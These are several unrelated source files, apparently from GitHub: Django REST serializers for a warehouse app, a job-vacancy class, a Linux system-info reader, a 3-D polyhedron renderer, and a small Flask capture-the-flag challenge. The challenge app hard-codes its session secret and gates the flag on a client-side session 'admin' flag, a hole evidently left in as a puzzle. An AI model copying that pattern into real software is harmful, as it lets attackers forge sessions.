class StaffSerializer(serializers.ModelSerializer):
    """Abstract base for staff serializers; the concrete Meta (model + fields)
    is injected per-model by getStaffSerializer() below."""
    Meta = None  # placeholder, replaced by the factory
def getStaffSerializer(model):
    """Serializer generator: build a StaffSerializer subclass bound to *model*."""
    field_names = ('id', 'firstname', 'lastname', 'phone', 'mobile', 'mail', 'gender')
    meta_cls = type("Meta", (), {'fields': field_names, 'model': model})
    return type(model.__name__ + 'Serializer', (StaffSerializer,), dict(Meta=meta_cls))
class ProjectSerializer(serializers.ModelSerializer):
    """Abstract base for project serializers; the concrete Meta is injected
    per-model by getProjectSerializer() below."""
    Meta = None  # placeholder, replaced by the factory
def getProjectSerializer(model, staffmodel):
    """Build a ProjectSerializer subclass bound to *model*, nesting read-only
    manager/leader serializers generated from *staffmodel*."""
    field_names = ('id', 'description', 'customer', 'address', 'country', 'zipcode', 'city', 'manager', 'leader',
                   'leaderid', 'managerid', 'status', 'start_project', 'end_project')
    attrs = dict(
        Meta=type("Meta", (), {'fields': field_names, 'model': model}),
        manager=getStaffSerializer(staffmodel)(read_only=True, allow_null=True),
        leader=getStaffSerializer(staffmodel)(read_only=True, allow_null=True),
    )
    return type(model.__name__ + 'Serializer', (ProjectSerializer,), attrs)
class SupplierSerializer(serializers.HyperlinkedModelSerializer):
    # def __init__(self, *args, **kwargs):
    #     # Only used for debugging. Extend init to print repr of Serializer instance.
    #     super(SupplierSerializer, self).__init__(*args, **kwargs)
    #     print(repr(self))
    # Abstract base for supplier serializers; the concrete Meta is injected
    # per-model by getSupplierSerializer() below.
    Meta = None
def getSupplierSerializer(model):
    """Build a SupplierSerializer subclass whose Meta is bound to *model*."""
    field_names = ('url', 'id', 'namea', 'nameb', 'address', 'zipcode', 'city', 'country', 'phone', 'fax', 'vatnum', 'active',
                   'numberorders', 'mainmail')
    meta_cls = type("Meta", (), {'fields': field_names, 'model': model})
    return type(model.__name__ + 'Serializer', (SupplierSerializer,), dict(Meta=meta_cls))
class UserSerializer(serializers.ModelSerializer):
    """Serializer for Django auth users (subset of fields)."""
    class Meta:
        model = User
        fields = ('id', 'username', 'email', 'first_name', 'last_name', 'groups')
class UserDataSerializer(serializers.ModelSerializer):
    """UserData profile serializer, flattening fields of the linked auth user."""
    # Read/write access to attributes of the related django User record.
    username = serializers.CharField(source='user.username', allow_blank=True)
    email = serializers.CharField(source='user.email', allow_blank=True)
    first_name = serializers.CharField(source='user.first_name', allow_blank=True)
    last_name = serializers.CharField(source='user.last_name', allow_blank=True)
    class Meta:
        model = UserData
        fields = ('user', 'username', 'email','first_name', 'last_name', 'companyid','hituserid')
class CompanySerializer(serializers.ModelSerializer):
    """Serializer for Company records.

    NOTE(review): no `fields`/`exclude` is declared; DRF >= 3.3 requires one
    of them on ModelSerializer -- confirm against the DRF version in use.
    """
    class Meta:
        model = Company
class StockSerializer(serializers.HyperlinkedModelSerializer):
    """Serializer for Stock warehouses."""
    class Meta:
        model = Stock
        fields = ('url', 'id', 'name', 'stockkeeper', 'type', 'defaultlocationid')
class StockMovementSerializer(serializers.ModelSerializer):
    """Serializer for stock-movement bookkeeping rows."""
    class Meta:
        model = StockMovement
        fields = ('movementid', 'datecreation', 'datemodification', 'stockid', 'prodid', 'quantitydelta',
                  'moduleid', 'modulerecordtypeid', 'key1', 'userid', 'comment')
# Serializer for product natures/categories.  The class "docstring" below is a
# disabled debugging __init__ kept by the author -- do not mistake it for docs.
class NatureSerializer(serializers.HyperlinkedModelSerializer):
    """def __init__(self, *args, **kwargs):
        #Only used for debugging. Extend init to print repr of Serializer instance.
        super(NatureSerializer, self).__init__(*args, **kwargs)
        print(repr(self))"""
    class Meta:
        model = Nature
        fields = ('url', 'id', 'title', 'name')
class ProductTypeSerializer(serializers.HyperlinkedModelSerializer):
    """Serializer for product types."""
    class Meta:
        model = ProductType
        fields = ('id', 'name')
class ProductSerializer(serializers.HyperlinkedModelSerializer):
    """Full product serializer with nested nature, suppliers, packings,
    default supplier and product type."""
    # def __init__(self, *args, **kwargs):
    #     #Only used for debugging. Extend init to print repr of Serializer instance.
    #     super(ProductSerializer, self).__init__(*args, **kwargs)
    #     print(repr(self))
    nature = serializers.SlugRelatedField(read_only=True, slug_field='name')
    supplier = serializers.HyperlinkedRelatedField(many=True, read_only=True, view_name="productsupplier-detail")
    packing = serializers.HyperlinkedRelatedField(many=True, read_only=True, view_name="productpacking-detail", lookup_field="pk")
    # defaultsupplier = serializers.SlugRelatedField(read_only=True, allow_null=True, slug_field='namea')
    defaultsupplier = getSupplierSerializer(Supplier01)(read_only=True, allow_null=True)
    producttype = ProductTypeSerializer(read_only=True, allow_null=True)
    #ToDo: getter for ProductSerializer
    class Meta:
        model = Product
        fields = (
            'url', 'id', 'name1', 'detailedname1', 'title', 'marked', 'unit1', 'grosspurchaseprice', 'netpurchaseprice',
            'stockcur', 'stockavail', 'salesmargin', 'salesprice', 'taxcodeinvoice',
            'taxcodecreditnote', 'shopprice', 'defaultsupplier', 'resourcenatureid', 'nature', 'supplier', 'packing',
            'producttype')
# Need to generate a fake request for our hyperlinked results
# NOTE(review): RequestFactory is Django's *test* utility; building a module-
# level fake request in production code is unusual -- confirm intent.
from django.test.client import RequestFactory
context = dict(request=RequestFactory().get('/'))
class StockDataSerializer(serializers.HyperlinkedModelSerializer):
    """Stock row serializer embedding the full nested product plus its nature."""
    prodid = ProductSerializer(read_only=True, allow_null=True)
    class Meta:
        model = StockData
        fields = (
            'url', 'id', 'rowid', 'stockid', 'prodid', 'quantitymin', 'quantitymax', 'quantitycur', 'quantityavail',
            'location')
    def to_representation(self, obj):
        # Enrich the default representation with the product's nature name,
        # serialized against the module-level fake-request context.
        data = super(StockDataSerializer, self).to_representation(obj)
        product = ProductSerializer(Product.objects.filter(id=obj.prodid)[0], context=context).data['nature']
        data['nature'] = product
        # data['prodid'] = NatureSerializer(Nature.objects.filter(id=obj.prodid)[0], context=context).data
        return data
class ProductPackingSerializer(serializers.HyperlinkedModelSerializer):
    """Serializer for product packing units."""
    class Meta:
        model = ProductPacking
        fields = ('url', 'rowid', 'packingid', 'prodid', 'name', 'quantity')
class ProductSupplierSerializer(serializers.HyperlinkedModelSerializer):
    """Product/supplier link rows, with the supplier nested read-only."""
    supplierid = getSupplierSerializer(Supplier01)(read_only=True, allow_null=True)
    class Meta:
        model = ProductSupplier
        fields = ('url', 'prodid', 'supplierid', 'purchaseprice', 'comment', 'unit', 'id')
"""def getProductSupplierSerializer(supplier_model):
fields = ('url', 'prodid', 'supplierid', 'purchaseprice', 'comment', 'unit', 'id')
return type('ProductSupplierSerializer', (ProductSupplierSerializer,), dict(
Meta=type("Meta", (), {
'fields': fields,
'model': ProductSupplier}),
supplierid=getStaffSerializer(supplier_model)(read_only=True, allow_null=True)
))
"""
from collections import OrderedDict
from rest_framework.fields import SkipField
from rest_framework.compat import unicode_to_repr
class FastProductSerializer(serializers.ModelSerializer):
    """Product serializer with a slimmed-down to_representation for speed."""
    def to_representation(self, instance):
        """
        Object instance -> Dict of primitive datatypes.
        """
        # ret = OrderedDict()
        ret = {}  # plain dict instead of OrderedDict (faster, order irrelevant here)
        fields = self._readable_fields
        for field in fields:
            try:
                attribute = field.get_attribute(instance)
            except SkipField:
                continue
            if attribute is None:
                # We skip `to_representation` for `None` values so that
                # fields do not have to explicitly deal with that case.
                ret[field.field_name] = None
            else:
                ret[field.field_name] = field.to_representation(attribute)
        return ret
    class Meta:
        model = Product
        fields = ('id', 'name1', 'detailedname1', 'title', 'marked', 'unit1', 'grosspurchaseprice', 'netpurchaseprice',
                  'stockcur', 'stockavail', 'salesmargin', 'salesprice', 'taxcodeinvoice',
                  'taxcodecreditnote', 'shopprice', 'defaultsupplier', 'resourcenatureid')
class DeliveryNoteDataSerializer(serializers.ModelSerializer):
    """Abstract base for delivery-note line serializers; Meta is injected by
    getDeliveryNoteDataSerializer() below."""
    rowid = serializers.IntegerField(allow_null=True)
    Meta = None  # placeholder, replaced by the factory
def getDeliveryNoteDataSerializer(model):
    """Build a DeliveryNoteDataSerializer subclass whose Meta is bound to *model*."""
    field_names = ('linetype', 'rowid', 'deliverynoteid', 'prodid', 'name', 'unit', 'quantity', 'price', 'amount', 'projectid',
                   'comment', 'dataid', 'packing', 'calclineexpression', 'quantityrejected', 'stockmovementid')
    meta_cls = type("Meta", (), {'fields': field_names, 'model': model})
    return type(model.__name__ + "Serializer", (DeliveryNoteDataSerializer,), dict(Meta=meta_cls))
class DeliveryNoteSerializer(serializers.ModelSerializer):
    """Abstract base delivery-note serializer with nested line data; the
    concrete Meta (model/datamodel) is injected by getDeliveryNoteSerializer()."""
    id = serializers.CharField(required=False, max_length=15, allow_blank=True)
    #data = DeliveryNoteDataSerializer(many=True, allow_null=True, required=False)
    Meta = None
    def create(self, validated_data):
        """ Creates a Deliverynote and corresponding Stockmovement"""
        data = validated_data.pop('data') # 'data' needs to be removed first
        model = self.Meta.model
        datamodel = self.Meta.datamodel
        deliverynote = model.objects.create(**validated_data)
        # Important: the foreign-key field must always reference the object
        # itself, not the object's id -- i.e. 'prodid': <Product: N999> and not
        # 'prodid': 'N999'.  The field name purchasedocid is confusing in this
        # case: rename to purchasedoc?
        for entry in data:
            data_data = dict(entry)
            datamodel.objects.create(deliverynoteid=deliverynote, **data_data)
        # add stockmovement
        # NOTE(review): datecreation is computed but unused because the stock
        # movement creation below is commented out -- confirm whether it should
        # be re-enabled or removed.
        datecreation = "%s-%s-%s" % (date.today().year, date.today().month, date.today().day)
        #stock = Stock.objects.get(id=deliverynote.stockid)
        #product = Product.objects.get(id=data_data["prodid"])
        #stockdata = StockData.objects.filter(stockid=0).filter(prodid__id=data_data["prodid"])
        #StockMovement.objects.create(datecreation=datecreation, datemodification=datecreation,
        #    stockid=stock, prodid=product, quantitydelta=data_data["quantity"], moduleid=6,
        #    modulerecordtypeid=6000, key1=deliverynote.id, userid=deliverynote.responsible)
        return deliverynote
def getDeliveryNoteSerializer(model, datamodel):
    """Build a DeliveryNoteSerializer subclass bound to *model*, nesting the
    line rows serialized via *datamodel*."""
    field_names = ('id', 'orderid','extdocno', 'subject', 'responsible', 'doctype', 'module', 'modulerefid', 'supplierid', 'status',
                   'docdate', 'stockid', 'supplierinvoicenumber', 'data')
    attrs = dict(
        Meta=type("Meta", (), {'fields': field_names, 'model': model, 'datamodel': datamodel}),
        data=getDeliveryNoteDataSerializer(datamodel)(many=True, allow_null=True, required=False),
    )
    return type(model.__name__ + "Serializer", (DeliveryNoteSerializer,), attrs)
class PurchaseDocDataSerializer(serializers.ModelSerializer):
    """Abstract base for purchase-document line serializers; Meta is injected
    by getPurchaseDocDataSerializer() below."""
    rowid = serializers.IntegerField(allow_null=True)
    Meta = None  # placeholder, replaced by the factory
def getPurchaseDocDataSerializer(model):
    """Build a PurchaseDocDataSerializer subclass whose Meta is bound to *model*."""
    field_names = ('rowid', 'purchasedocid', 'prodid', 'name', 'unit', 'quantity', 'price', 'amount', 'packing', 'comment', 'dataid', 'projectid', 'stockmovementid')
    meta_cls = type("Meta", (), {'fields': field_names, 'model': model})
    return type(model.__name__ + "Serializer", (PurchaseDocDataSerializer,), dict(Meta=meta_cls))
class PurchaseDocSerializer(serializers.ModelSerializer):
    """Base purchase-document serializer with nested lines and delivery notes.

    NOTE(review): this base Meta declares only `fields`; the concrete `model`
    and `datamodel` attributes are supplied by getPurchaseDocSerializer(), so
    the class is not usable directly.
    """
    id = serializers.CharField(required=False, max_length=15, allow_blank=True)
    class Meta:
        fields = (
            'url', 'id','subject','responsible','leader','doctype', 'module','modulerefid', 'supplierid', 'status',
            'docdate', 'data', 'deliverynotes','stockid')
    def create(self, validated_data):
        """Create the purchase document plus its nested line rows."""
        data = validated_data.pop('data') # 'data' needs to be removed first
        # NOTE(review): deliverynotes is popped (so the nested write does not
        # crash) but never persisted -- confirm this is intended.
        deliverynotes = validated_data.pop('deliverynotes')
        # reference model from Meta, so it is replaced in inherited serializers
        purchasedoc = self.Meta.model.objects.create(**validated_data)
        # Important: the foreign-key field must always reference the object
        # itself, not the object's id -- i.e. 'prodid': <Product: N999> and not
        # 'prodid': 'N999'.  The field name purchasedocid is confusing in this
        # case: rename to purchasedoc?
        for entry in data:
            data_data = dict(entry)
            self.Meta.datamodel.objects.create(purchasedocid=purchasedoc, **data_data)
        return purchasedoc
    def update(self, instance, validated_data):
        """Flat (non-nested) update of the document's own attributes."""
        # The standard implementation is fine, as long as we do not use it for nested writes
        for attr, value in validated_data.items():
            setattr(instance, attr, value)
        instance.save()
        return instance
def getPurchaseDocSerializer(model, datamodel, delno_model, delno_datamodel):
    """Build a PurchaseDocSerializer subclass bound to *model*/*datamodel*,
    nesting delivery notes built from *delno_model*/*delno_datamodel*."""
    field_names = ('url','id','subject','remark','responsible','leader','doctype', 'module','modulerefid', 'supplierid', 'status',
                   'docdate', 'data', 'deliverynotes','stockid')
    attrs = dict(
        Meta=type("Meta", (), {'fields': field_names, 'model': model, 'datamodel': datamodel}),
        data=getPurchaseDocDataSerializer(datamodel)(many=True, allow_null=True, required=False),
        deliverynotes=getDeliveryNoteSerializer(delno_model, delno_datamodel)(many=True, allow_null=True, required=False),
    )
    return type(model.__name__ + "Serializer", (PurchaseDocSerializer,), attrs)
class PurchaseDocumentsSerializer(serializers.ModelSerializer):
    """Serializer for purchase-document attachments.

    NOTE(review): no `fields`/`exclude` declared -- required by DRF >= 3.3.
    """
    class Meta:
        model = PurchaseDocuments
class LagerausgangSerializer(serializers.ModelSerializer):
    """Serializer for stock-issue (Lagerausgang) records.

    NOTE(review): no `fields`/`exclude` declared -- required by DRF >= 3.3.
    """
    class Meta:
        model = Lagerausgang
class MinPurchaseDocSerializer(serializers.ModelSerializer):
    """Slim purchase-document serializer for list views (PurchaseDoc01 backend)."""
    id = serializers.CharField(required=False, max_length=15, allow_blank=True)
    class Meta:
        model = PurchaseDoc01
        fields = ('url', 'id', 'responsible', 'doctype', 'module', 'status', 'docdate')
class InstallationLinksSerializer(serializers.ModelSerializer):
    """Serializer for file/document links attached to an installation."""
    rowid = serializers.IntegerField(allow_null=True)
    class Meta:
        model = InstallationLinks
        fields = ('id','rowid','filename','name','date')
class InstallationConsumptionSerializer(serializers.ModelSerializer):
    """Serializer for installation consumption entries."""
    rowid = serializers.IntegerField(allow_null=True)
    class Meta:
        model = InstallationConsumption
        fields = ('id','rowid','date','quantity')
class InstallationCounterHistorySerializer(serializers.ModelSerializer):
    """Serializer for installation counter (odometer) history rows."""
    class Meta:
        model = InstallationCounterHistory
        fields = ('id','datecounter','counter')
class InstallationSerializer(serializers.ModelSerializer):
    """Installation (machine/vehicle) serializer with nested product and links."""
    prodid = ProductSerializer(read_only=True, allow_null=True)
    links = InstallationLinksSerializer(many=True, allow_null=True, required=False)
    #links = serializers.HyperlinkedRelatedField(many=True, read_only=True, view_name="installationlinks-detail",
    #                                            lookup_field="pk")
    class Meta:
        model = Installation
        fields = ('id','name1','name2','chassisnum','licenseplate','purchasevalue','availability','availabilitystatus',
                  'availabilitystatusold','rentperdayresourceid','title','titlegrade','prodid','links','gpstag',
                  'constructionyear','datepurchase')
| MatthiasLenz/Lagerverwaltung | lagerapp/masterdata/serializers.py | serializers.py | py | 15,412 | python | en | code | 1 | github-code | 13 |
class Vacancy:
    """Class to represent vacancy information.

    Instances are ordered and compared by their ``salary``; comparing against
    anything that is not a Vacancy raises ValueError (as before).
    """

    def __init__(self, name: str, url: str, salary: int,
                 employer: str, requirement: str) -> None:
        """
        Instance initialisation
        :name: Vacancy name
        :url: URL link to vacancy
        :salary: Minimum salary
        :employer: Name of the employing company
        :requirement: Vacancy requirements
        Raises TypeError if any argument has the wrong type.
        """
        # Validate data for attributes.  type(...) checks (not isinstance) are
        # kept on purpose to preserve the original strictness, e.g. a bool is
        # rejected where an int is required.
        if type(name) is not str:
            raise TypeError('Vacancy name must be string')
        if type(url) is not str:
            raise TypeError('Vacancy URL must be string')
        if type(salary) is not int:
            raise TypeError('Vacancy salary must be integer')
        # FIX: the original messages below wrongly said
        # "description ... integer" / "requirement ... integer".
        if type(employer) is not str:
            raise TypeError('Vacancy employer must be string')
        if type(requirement) is not str:
            raise TypeError('Vacancy requirement must be string')
        self.name = name
        self.url = url
        self.salary = salary
        self.employer = employer
        self.requirement = requirement

    def __repr__(self) -> str:
        """Returns a developer representation of Vacancy class"""
        return (
            f"Vacancy({self.name}, {self.url}, {self.salary}, "
            f"{self.employer}, {self.requirement})"
        )

    def __str__(self) -> str:
        """"Returns a user representation of Vacancy class"""
        return (
            f"Name: {self.name}\n"
            f"URL: {self.url}\n"
            f"Salary: {self.salary}\n"
            f"Company: {self.employer}\n"
            f"Requirement:\n{self.requirement}\n"
        )

    @staticmethod
    def _other_salary(other) -> int:
        """Return the salary of *other*, or raise for non-Vacancy operands."""
        if type(other) == Vacancy:
            return other.salary
        raise ValueError("Must be <Vacancy> object")

    def __eq__(self, other) -> bool:
        """Checks if salaries between two vacancies are equal"""
        return self.salary == self._other_salary(other)

    def __lt__(self, other) -> bool:
        """Checks if salary of this vacancy is less than other"""
        return self.salary < self._other_salary(other)

    def __le__(self, other) -> bool:
        """Checks if salary of this vacancy is less than other or equal"""
        return self.salary <= self._other_salary(other)

    def __gt__(self, other) -> bool:
        """Checks if salary of this vacancy is more than other"""
        return self.salary > self._other_salary(other)

    def __ge__(self, other) -> bool:
        """Checks if salary of this vacancy is more than other or equal"""
        return self.salary >= self._other_salary(other)
| MarkPcv/vacancy_parser_oop | services/vacancy.py | vacancy.py | py | 3,162 | python | en | code | 1 | github-code | 13 |
20511403367 | from flask import *
from flag import getflag
app = Flask(__name__)
# NOTE: the hard-coded session secret is part of this CTF challenge's setup.
app.secret_key = 'oh you got it, one more step to get flag'
@app.route('/', methods=['GET', 'POST'])
def index():
    # JSON requests drive the challenge API; any other request renders the page.
    if request.is_json:
        action = request.json.get('action', '').strip()
        # The expected flag is derived from the caller-supplied token each request.
        flag = getflag(request.json.get('token', '').strip())
        if action=='login':
            # NOTE(review): plain == is not a constant-time comparison; fine
            # for this game, but use hmac.compare_digest for real secrets.
            if request.json.get('flag', '').strip()==flag:
                session['admin'] = True
                return '已登录'
            else:
                return 'flag错误'
        elif action=='logout':
            session['admin'] = False
            return '已注销'
        elif action=='getflag':
            # Only a logged-in (admin) session may read the flag back.
            if 'admin' in session and session['admin']:
                return 'Here is your flag: '+flag
            else:
                return '请登录后查看flag'
        else:
            return '操作无效'
    else:
        return render_template('index.html')
@app.route('/src')
def src():
    # Serve this file's own source as plain text, with the secret key redacted.
    with open(__file__, encoding='utf-8') as f:
        src = f.read()
    src = src.replace(repr(app.secret_key), '***')
    resp = Response(src)
    resp.headers['content-type'] = 'text/plain; charset=utf-8'
    return resp
# FIX: stray dataset metadata was fused onto this line, breaking the syntax;
# restore the statement.  Positional args: host, port, debug=True (the Flask
# development server -- acceptable for this CTF, never for production).
app.run('0.0.0.0', 5000, True)
40808750050 | import platform
import subprocess
class NixSys(object):
    """Collects basic system information (identity, CPU, RAM) on Linux.

    Static facts are parsed once from /proc/cpuinfo at construction; call
    :meth:`update` periodically to refresh the CPU and RAM readings.
    """

    def __init__(self):
        uname = platform.uname()
        arch = platform.architecture()
        self.name = uname.node
        self.release = uname.release
        self.version = uname.version
        self.machine = uname.machine
        self.arch = arch[0]
        self.cpu_model = ""
        self.cpu_processor = ""
        self.cpu_mhz = ""
        self.mem_total = 0
        self.mem_free = 0
        self.cpu_usage = 1
        # Previous /proc/stat counters, used for the usage delta in _cpu().
        self._prev_idle = 0
        self._prev_total = 0
        # CPU INFO -- parse static CPU facts once at startup.
        # FIX: use a context manager so the file handle is closed (was leaked).
        with open('/proc/cpuinfo') as cpuinfo:
            cpuraw = cpuinfo.read()
        for line in cpuraw.splitlines():
            line = line.split(":")
            line[0] = line[0].strip("\t")
            if len(line) > 1:
                line[1] = line[1].strip("\t")
                if line[0] == "model name":
                    self.cpu_model = line[1]
                elif line[0] == "processor":
                    self.cpu_processor = line[1]
                elif line[0] == "cpu MHz":
                    self.cpu_mhz = line[1]

    async def _ram(self):
        """Refresh mem_total / mem_free (as MB strings) from /proc/meminfo."""
        # FIX: context manager closes the file handle (was leaked).
        with open('/proc/meminfo') as meminfo:
            memraw = meminfo.read()
        for line in memraw.splitlines():
            line = line.split(":")
            line[0] = line[0].strip("\t")
            if len(line) > 1:
                line[1] = line[1].strip("\t")
                if line[0] == "MemTotal":
                    self.mem_total = line[1].strip(" kB")
                    self.mem_total = str(int(int(self.mem_total) / 1024))
                if line[0] == "MemFree":
                    self.mem_free = line[1].strip(" kB")
                    self.mem_free = str(int(int(self.mem_free) / 1024))

    async def _cpu(self):
        """Refresh cpu_usage (percent) from the aggregate line of /proc/stat.

        The usage is a delta against the previous call, so the first call
        measures activity since boot.
        """
        self.cpu_usage = 1
        # FIX: context manager closes the file handle (was leaked).
        with open('/proc/stat') as stat:
            raw = stat.read()
        # First line: "cpu  user nice sys idle iowait irq softirq steal ..."
        # (the double space after "cpu" makes the first number land at index 2).
        cpu = raw.splitlines()[0].split(" ")
        user = int(cpu[2])
        nice = int(cpu[3])
        sys = int(cpu[4])
        idle = int(cpu[5])
        iow = int(cpu[6])
        irq = int(cpu[7])
        sirq = int(cpu[8])
        steal = int(cpu[9])
        current_idle = idle + iow
        current_nonidle = user + nice + sys + irq + sirq + steal
        current_total = current_idle + current_nonidle
        total = current_total - self._prev_total
        idled = current_idle - self._prev_idle
        # FIX: catch only the division-by-zero that occurs when two calls land
        # in the same jiffy (the original bare `except:` hid every error).
        try:
            self.cpu_usage = int((total - idled) / total * 100)
        except ZeroDivisionError:
            print(total, idled)
        self._prev_idle = current_idle
        self._prev_total = current_total

    async def _top(self):
        """Best-effort fallback that parses `top -b -n 1` output.

        NOTE(review): the summed `total` below is currently discarded, so
        cpu_usage keeps its placeholder value here -- looks unfinished.
        """
        self.cpu_usage = 1
        self.mem_total = 100
        self.mem_free = 1
        try:
            raw = subprocess.check_output(['top','-b','-n 1'])
            lines = raw.splitlines()
            #MEM
            mem = str(lines[3])
            mem2 = mem.replace("  ", " ").replace("  ", " ").replace("  ", " ").split(" ")
            self.mem_total = mem2[2]
            self.mem_free = mem2[6]
            #CPU
            usage_index = str(lines[6]).index("%CPU")-1
            total = 0
            for i in range(7,len(lines)):
                total += float(str(lines[i])[usage_index:usage_index+5])
        except Exception:
            # best-effort: keep the placeholder values if `top` is missing or
            # its output format differs (was a bare except)
            pass

    async def update(self):
        """Refresh the RAM and CPU readings (call periodically)."""
        await self._ram()
        await self._cpu()
| alierkanimrek/rpct | src/axones/nixsys/main.py | main.py | py | 3,450 | python | en | code | 0 | github-code | 13 |
73788712338 | import shapes
import rendering
import matrix
import math
# Variáveis globais
window_width = 640
window_height = 480
cubo = None
x_axis, y_axis, z_axis = None, None, None
controls = False
controls_string_off = "Pressione [TAB] para exibir os controles"
controls_string_on = """Translacao:
Q = X+ | W = X-
E = Y+ | R = Y-
T = Z+ | Y = Z-
Escala:
A = X+ | S = X-
D = Y+ | F = Y-
G = Z+ | H = Z-
Rotacao:
Z = X+ | X = X-
C = Y+ | V = Y-
B = Z+ | N = Z-"""
controls_string_extra = """Extras:
[TAB] = Exibe/Esconde
o menu de ajuda.
[BACKSPACE] = Reinicia
o poliedro para suas
configuracoes originais.
P = Altera a funcao
de projecao."""
class Polyhedron:
    """Wireframe 3-D solid described by vertexes and edges, carrying its own
    scale / rotation / translation state and a projection mode for rendering."""
    # Class-level projection settings shared by all polyhedrons.
    render_method = 0  # 0 = cavalier, 1 = cabinet, 2 = isometric (see render())
    proj_angle = 45    # angle in degrees used by the oblique projections

    # Class constructor
    def __init__(self):
        """Start with no geometry and identity transformations."""
        self.vertexes = []
        self.edges = []
        self.rotation = [0, 0, 0]   # Euler angles in degrees
        self.translation = [0, 0, 0]
        self.scaling = [1, 1, 1]
        self.info = False           # whether to show vertex info
        self.border_color = 255

    # Adds a vertex to the list
    def addVertex(self, new_vertex):
        """Append a vertex [x, y, z]; a list of vertexes is added recursively."""
        if type(new_vertex[0]) is int:
            self.vertexes.append(new_vertex)
        elif type(new_vertex[0]) is float:
            self.vertexes.append(new_vertex)
        elif type(new_vertex[0]) is list:
            for single_vertexes in new_vertex:
                self.addVertex(single_vertexes)
        else:
            assert 0 == 1, "Vértice(s) inválido(s)!"

    # Adds an edge to the list
    def addEdge(self, new_edge):
        """Append an edge [i, j] of vertex indexes; a list of edges is added recursively."""
        if type(new_edge[0]) is int:
            self.edges.append(new_edge)
        elif type(new_edge) is list:
            for single_edges in new_edge:
                self.addEdge(single_edges)
        else:
            assert 0 == 1, "Aresta(s) inválida(s)!"

    def rotate(self, angle_array):
        """Set the rotation angles [rx, ry, rz] in degrees."""
        self.rotation = angle_array

    def translate(self, translation_array):
        """Set the translation [tx, ty, tz]."""
        self.translation = translation_array

    def scale(self, scale_array):
        """Set the scale factors [sx, sy, sz]."""
        self.scaling = scale_array

    def update(self):
        """Return a copy of this polyhedron with scale, rotation and translation
        applied to its vertexes; the original object is left untouched."""
        vertex_n = len(self.vertexes)
        # Build the vertex matrix (one row per vertex).
        updated_m = matrix.Matrix(vertex_n, 3, [])
        for index in range(vertex_n):
            updated_m.data.append(self.vertexes[index][0])
            updated_m.data.append(self.vertexes[index][1])
            updated_m.data.append(self.vertexes[index][2])
        # Compute the object's central point (pivot for scale/rotation).
        mean = [0, 0, 0]
        for vertex in self.vertexes:
            mean[0] += vertex[0]
            mean[1] += vertex[1]
            mean[2] += vertex[2]
        mean[0] = float(mean[0]) / vertex_n
        mean[1] = float(mean[1]) / vertex_n
        mean[2] = float(mean[2]) / vertex_n
        # Initial translation matrix: moves the pivot onto the origin.
        itransl_m = matrix.Matrix(vertex_n, 3, [])
        for index in range(vertex_n):
            itransl_m.data.append(-mean[0])
            itransl_m.data.append(-mean[1])
            itransl_m.data.append(-mean[2])
        sx, sy, sz = self.scaling[0], self.scaling[1], self.scaling[2]
        # Scale matrix.
        scale_m = matrix.Matrix(3, 3, [sx, 0, 0,
                                       0, sy, 0,
                                       0, 0, sz])
        # Pre-compute sines and cosines of the rotation angles.
        a = cos(radians(self.rotation[0]))
        b = sin(radians(self.rotation[0]))
        c = cos(radians(self.rotation[1]))
        d = sin(radians(self.rotation[1]))
        e = cos(radians(self.rotation[2]))
        f = sin(radians(self.rotation[2]))
        # Combined rotation matrix, obtained by multiplying the three
        # single-axis rotation matrices together.
        rotation_m = matrix.Matrix(3, 3, [((c * e) - (b * d * f)), (-a * f), ((d * e) + (b * c * f)),
                                          ((b * d * e) + (c * f)), (a * e), ((-b * c * e) + (d * f)),
                                          (-a * d), b, (a * c)])
        # Final translation matrix of the polyhedron.
        transl_m = matrix.Matrix(vertex_n, 3, [])
        for index in range(vertex_n):
            transl_m.data.append(self.translation[0])
            transl_m.data.append(self.translation[1])
            transl_m.data.append(self.translation[2])
        # Apply: move pivot to origin, scale, rotate, move back, translate.
        updated_m += itransl_m
        updated_m *= scale_m
        updated_m *= rotation_m
        updated_m -= itransl_m
        updated_m += transl_m
        # Drop the helper matrices.
        itransl_m = None
        scale_m = None
        rotation_m = None
        transl_m = None
        # Build the transformed polyhedron.
        updated = Polyhedron()
        for index in range(vertex_n):
            updated.addVertex(updated_m[index])
        for index in range(len(self.edges)):
            updated.addEdge(self.edges[index])
        updated.info = self.info
        updated.border_color = self.border_color
        updated.render_method = self.render_method
        return updated

    def render(self):
        """Project and draw the transformed polyhedron with the current method."""
        if self.render_method == 0:
            rendering.cavalier(self.update(), self.proj_angle)
        elif self.render_method == 1:
            rendering.cabinet(self.update(), self.proj_angle)
        elif self.render_method == 2:
            rendering.isometric(self.update())

    def __copy__(self):
        """Standard copy protocol: shallow copy of geometry and state.

        FIX: the original referenced self.filled, self.paint_points and
        self.fill_color -- attributes that no longer exist on this class --
        so copy.copy() always raised AttributeError.  Copy the attributes the
        class actually has (mirroring update()).
        """
        new = Polyhedron()
        new.vertexes = self.vertexes
        new.edges = self.edges
        new.rotation = self.rotation
        new.translation = self.translation
        new.scaling = self.scaling
        new.info = self.info
        new.border_color = self.border_color
        new.render_method = self.render_method
        return new
####################################################################################################################################################
def setup():
    """Processing entry point: configure the window, build the three axis
    gizmos and the demo cube, then draw the first frame."""
    global cubo, x_axis, y_axis, z_axis
    #size(window_width, window_height) # Sets the window size (superseded by fullScreen()).
    fullScreen()
    background(0) # Background colour; 0 is black (the original comment claimed white).
    ellipseMode(RADIUS) # Ellipses are positioned by their centre point.
    textAlign(CENTER) # Text alignment.
    textSize(10) # Default text size.
    # Axes: each one is a two-vertex, one-edge polyhedron anchored at the
    # screen centre and stretched along one world axis.
    x_axis = Polyhedron()
    x_axis.addVertex([0, 0, 0])
    x_axis.addVertex([1, 0, 0])
    x_axis.addEdge([0, 1])
    x_axis.translate([width/2, height/2, 0])
    x_axis.border_color = color(0, 0, 200)
    x_axis.scale([2000, 2000, 2000])
    y_axis = Polyhedron()
    y_axis.addVertex([0, 0, 0])
    y_axis.addVertex([0, 1, 0])
    y_axis.addEdge([0, 1])
    y_axis.translate([width/2, height/2, 0])
    y_axis.border_color = color(200, 0, 0)
    y_axis.scale([2000, 2000, 2000])
    z_axis = Polyhedron()
    z_axis.addVertex([0, 0, 0])
    z_axis.addVertex([0, 0, 1])
    z_axis.addEdge([0, 1])
    z_axis.translate([width/2, height/2, 0])
    z_axis.border_color = color(0, 200, 0)
    z_axis.scale([2000, 2000, 3000]) # NOTE(review): z scaled 3000 vs 2000 for x/y -- confirm intended.
    # Test polyhedron: a unit cube centred on the origin.
    cubo = Polyhedron()
    cubo.addVertex([-1, -1, -1]) # A, 0
    cubo.addVertex([-1, 1, -1]) # B, 1
    cubo.addVertex([1, 1, -1]) # C, 2
